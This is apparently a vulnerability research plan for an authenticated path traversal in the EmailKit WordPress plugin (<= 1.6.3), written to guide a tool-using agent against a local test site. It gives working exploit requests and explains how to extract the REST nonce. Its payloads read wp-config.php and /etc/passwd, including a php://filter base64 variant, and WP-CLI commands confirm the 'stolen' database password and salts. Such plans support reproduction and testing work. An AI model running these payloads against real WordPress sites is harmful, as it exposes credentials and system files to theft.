Vulnerability Research Plan: CVE-2026-3474 (EmailKit Path Traversal)

1. Vulnerability Summary

The EmailKit plugin (<= 1.6.3) contains an authenticated path traversal vulnerability in its REST API implementation. The EmailKit\Admin\Api\TemplateData::action() method accepts a file path via the emailkit-editor-template parameter and passes it directly to file_get_contents() without validation. The content of the file is then stored as post meta in a newly created emailkit post. An attacker with Administrator privileges can exploit this to read sensitive files (e.g., wp-config.php, /etc/passwd) by retrieving the created post's metadata.

2. Attack Vector Analysis

• Endpoint: /wp-json/emailkit/v1/template-data
• HTTP Method: POST (or any method, as ALLMETHODS is registered)
• Vulnerable Parameter: emailkit-editor-template
• Required Authentication: Administrator (manage_options capability)
• Required Header: X-WP-Nonce (set to a valid wp_rest nonce)
• Data Persistence: The file content is saved to the emailkit_template_content_object and emailkit_template_content_html meta keys of a new emailkit post.

3. Code Flow

1. Entry Point: The REST route emailkit/v1/template-data is registered in includes/Admin/Api/TemplateData.php within the __construct method.
2. Nonce Verification: The action() function first verifies the nonce:

   if (!wp_verify_nonce($request->get_header( 'X-WP-Nonce' ), 'wp_rest')) { ... }
   

3. Authorization: It checks for admin capabilities:

   if (!is_user_logged_in() || !current_user_can( 'manage_options' )) { ... }
   

4. Vulnerable Sink: The code retrieves the emailkit-editor-template parameter and reads the file:

   if(!empty($request->get_param( 'emailkit-editor-template' ) ...)){
       $template = file_get_contents($request->get_param( 'emailkit-editor-template' ))??'';
       $html = file_get_contents(str_replace( "content.json", "content.html", $request->get_param( 'emailkit-editor-template' )))??'';
   }
   

5. Persistent Storage: A new post of type emailkit is created using wp_insert_post(). The file contents ($template and $html) are stored in meta_input:

   $data = array(
       'post_type'   => 'emailkit',
       'meta_input'  => array(
           'emailkit_template_content_html'    => $html,
           'emailkit_template_content_object'  => $template,
           ...
       )
   );
   $post_id = wp_insert_post($data);
   

4. Nonce Acquisition Strategy

The endpoint requires a wp_rest nonce. This is the standard WordPress REST API nonce.

1. Login: Authenticate as an Administrator.
2. Navigate: Use browser_navigate to go to the WordPress dashboard (/wp-admin/).
3. Extract: Use browser_eval to extract the nonce from the global wpApiSettings object, which is automatically enqueued on most admin pages.
   • JS Command: browser_eval("wpApiSettings.nonce")
4. Alternative: If wpApiSettings is missing, navigate to the EmailKit settings page (slug likely emailkit) and look for localized scripts.

5. Exploitation Strategy

Step 1: File Inclusion (Write Phase)

Send a POST request to the vulnerable endpoint to read a sensitive file (e.g., wp-config.php).

• Tool: http_request
• URL: http://localhost:8080/wp-json/emailkit/v1/template-data
• Headers:
  • Content-Type: application/json
  • X-WP-Nonce: [EXTRACTED_NONCE]
• Body (JSON):

  {
    "emailkit-editor-template": "../../../wp-config.php",
    "emailkit_template_title": "Exploit Template",
    "emailkit_email_type": "test",
    "emailkit_template_type": "test"
  }
  

• Expected Response: {"status":"success","data":{"templateId":123,...}}

Step 2: Content Retrieval (Read Phase)

The vulnerability description mentions a fetch-data REST API endpoint. Based on common patterns in this plugin:

• Endpoint: /wp-json/emailkit/v1/fetch-data (inferred)
• Method: GET
• Params: form_id=[templateId from Step 1]

Fallback Retrieval:
If the fetch-data endpoint is not easily identified, the data can be confirmed via the standard WordPress post meta.

6. Test Data Setup

1. User: Create an administrator user (e.g., admin_pwn / password123).
2. Plugin: Ensure emailkit version 1.6.3 is installed and active.
3. Target File: Ensure wp-config.php exists in the standard location (root).

7. Expected Results

• The REST API should return a success status and a templateId.
• The database (or the retrieval endpoint) should contain the plaintext content of wp-config.php (including DB_PASSWORD and AUTH_KEY salts) inside the emailkit_template_content_object meta field for the generated post.

8. Verification Steps

After the HTTP exploit, verify the file contents were successfully stolen using WP-CLI:

# Get the latest emailkit post ID
POST_ID=$(wp post list --post_type=emailkit --format=ids | awk '{print $1}')

# Check the meta content
wp post meta get $POST_ID emailkit_template_content_object

9. Alternative Approaches

• System File Read: Target /etc/passwd if the environment is Linux:
  • Payload: emailkit-editor-template=/etc/passwd
• Protocol Wrapper: Try reading files using PHP filters if direct paths are blocked by some environment settings:
  • Payload: emailkit-editor-template=php://filter/convert.base64-encode/resource=../../../wp-config.php
• Post Update: If postIdField is provided in the JSON body, the action() function might update an existing post instead of creating a new one (requires checking the logic for !empty($req->postIdField) which is truncated in the provided snippet but suggested by variable usage).